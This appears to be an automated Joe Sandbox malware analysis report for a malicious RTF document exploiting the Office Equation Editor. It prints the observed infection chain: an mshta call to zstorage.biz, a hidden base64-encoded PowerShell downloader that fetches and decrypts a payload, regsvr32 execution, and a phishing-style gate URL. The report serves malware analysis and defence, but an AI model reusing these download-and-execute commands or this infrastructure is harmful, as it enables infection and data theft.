Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:37746
Start time:22:20:47
Joe Sandbox Product:CloudBasic
Start date:21.11.2017
Overall analysis duration:0h 7m 46s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5ZFXLxew8B.rtf
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection:MAL
Classification:mal80.expl.evad.winRTF@10/22@2/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 18
  • Number of non-executed functions: 25
Cookbook Comments:
  • Found application associated with file extension: .rtf
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 0
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, WmiApSrv.exe, svchost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe


Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Exploits:

barindex
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Office equation editor starts processes (likely CVE 2017-11882)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\mshta.exe

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: zstorage.biz
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49164 -> 185.82.23.166:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49164 -> 185.82.23.166:443

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Found strings which match to known social media urlsShow sources
Source: msxsl.exeString found in binary or memory: $mail.yahoo.org.kz.( equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: kFhttps://mail.yahoo.org.kz/v/img.phpU equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: mail.yahoo.org.kz equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: mail.yahoo.org.kz% equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: mail.yahoo.org.kz5 equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: mail.yahoo.org.kz>v equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: tmail.yahoo.org.kz equals www.yahoo.com (Yahoo)
Source: msxsl.exeString found in binary or memory: var Gate = "https://mail.yahoo.org.kz/v/img.php"; equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: zstorage.biz
Urls found in memory or binary dataShow sources
Source: powershell.exeString found in binary or memory: file://
Source: WINWORD.EXE, powershell.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: mshta.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Conte
Source: msxsl.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/
Source: msxsl.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txt
Source: msxsl.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txtl
Source: msxsl.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txtro
Source: msxsl.exeString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/D32E4DB3961AD18.txt
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/5ZFXLxew8B.rtf
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/5ZFXLxew8B.rtfz
Source: powershell.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/mscorlib.dll
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/6
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_32/System.Transactions/2.0.0.0__b77a5c561934e089/System.Transactions
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Configuration.Install/2.0.0.0__b03f5f7f11d50a3a/System.C
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Core/3.5.0.0__b77a5c561934e089/System.Core.dll
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.DirectoryServices/2.0.0.0__b03f5f7f11d50a3a/System.Direc
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management/2.0.0.0__b03f5f7f11d50a3a/System.Management.d
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
Source: msxsl.exeString found in binary or memory: file://C:
Source: mshta.exe, powershell.exeString found in binary or memory: http://
Source: msxsl.exeString found in binary or memory: http://8.8.8.8/
Source: mshta.exeString found in binary or memory: http://U
Source: mshta.exe, powershell.exeString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exeString found in binary or memory: http://c
Source: mshta.exe, powershell.exeString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: mshta.exe, powershell.exeString found in binary or memory: http://cps.letsencrypt.org0
Source: mshta.exe, powershell.exeString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, powershell.exeString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: mshta.exe, powershell.exeString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: mshta.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: mshta.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enb
Source: mshta.exe, powershell.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08.3.drString found in binary or memory: http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUx
Source: mshta.exe, powershell.exeString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: mshta.exeString found in binary or memory: http://isrg.trustid.ocsp.identrust.comhttp://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: powershell.exeString found in binary or memory: http://java.com/
Source: mshta.exeString found in binary or memory: http://miclr1
Source: powershell.exeString found in binary or memory: http://ocs
Source: powershell.exeString found in binary or memory: http://ocsp
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, powershell.exeString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: mshta.exe, powershell.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, powershell.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exeString found in binary or memory: http://www.microsoft.
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.comd
Source: mshta.exe, powershell.exeString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: mshta.exe, powershell.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: powershell.exeString found in binary or memory: http://www.us
Source: mshta.exe, powershell.exeString found in binary or memory: http://www.usertrust.com1
Source: powershell.exeString found in binary or memory: http://www.usust.
Source: mshta.exeString found in binary or memory: http://z
Source: mshta.exe, powershell.exeString found in binary or memory: https://letsencrypt.org/repository/0
Source: msxsl.exeString found in binary or memory: https://mail.yahoo.org.kz/v/img.php
Source: msxsl.exeString found in binary or memory: https://mail.yahoo.org.kz/v/img.phpU
Source: mshta.exe, powershell.exeString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exeString found in binary or memory: https://zsto
Source: powershell.exeString found in binary or memory: https://zstorage
Source: powershell.exeString found in binary or memory: https://zstorage.biz
Source: mshta.exeString found in binary or memory: https://zstorage.biz/
Source: mshta.exeString found in binary or memory: https://zstorage.biz/E
Source: powershell.exeString found in binary or memory: https://zstorage.biz/f111.txT
Source: powershell.exeString found in binary or memory: https://zstorage.biz/f111.txt
Source: powershell.exeString found in binary or memory: https://zstorage.biz/f111.txtt
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txt
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txt&XXXXXX
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txt...
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txt...a
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txtC:
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txtZ
Source: mshta.exeString found in binary or memory: https://zstorage.biz/read.txttC
Source: powershell.exeString found in binary or memory: https://zstorageX
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Drops certificate files (DER)Show sources
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: scrrun.pdb source: msxsl.exe
Source: Binary string: mscorrc.pdb source: powershell.exe
Classification labelShow sources
Source: classification engineClassification label: mal80.expl.evad.winRTF@10/22@2/1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10001353 CreateToolhelp32Snapshot,9_1_10001353
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$FXLxew8B.rtf
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR1597.tmp
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 10004F02 appears 181 times
Reads the hosts fileShow sources
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Blacklisted process start detected (Windows program)Show sources
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 185.82.23.166 443
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2862
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2862

Data Obfuscation:

barindex
PE file contains sections with non-standard namesShow sources
Source: IkqJfeZNVt.txt.7.drStatic PE information: section name: .code
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt
May use bcdedit to modify the Windows boot settingsShow sources
Source: powershell.exeBinary or memory string: bcdedit.exeN
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt
Installs new ROOT certificatesShow sources
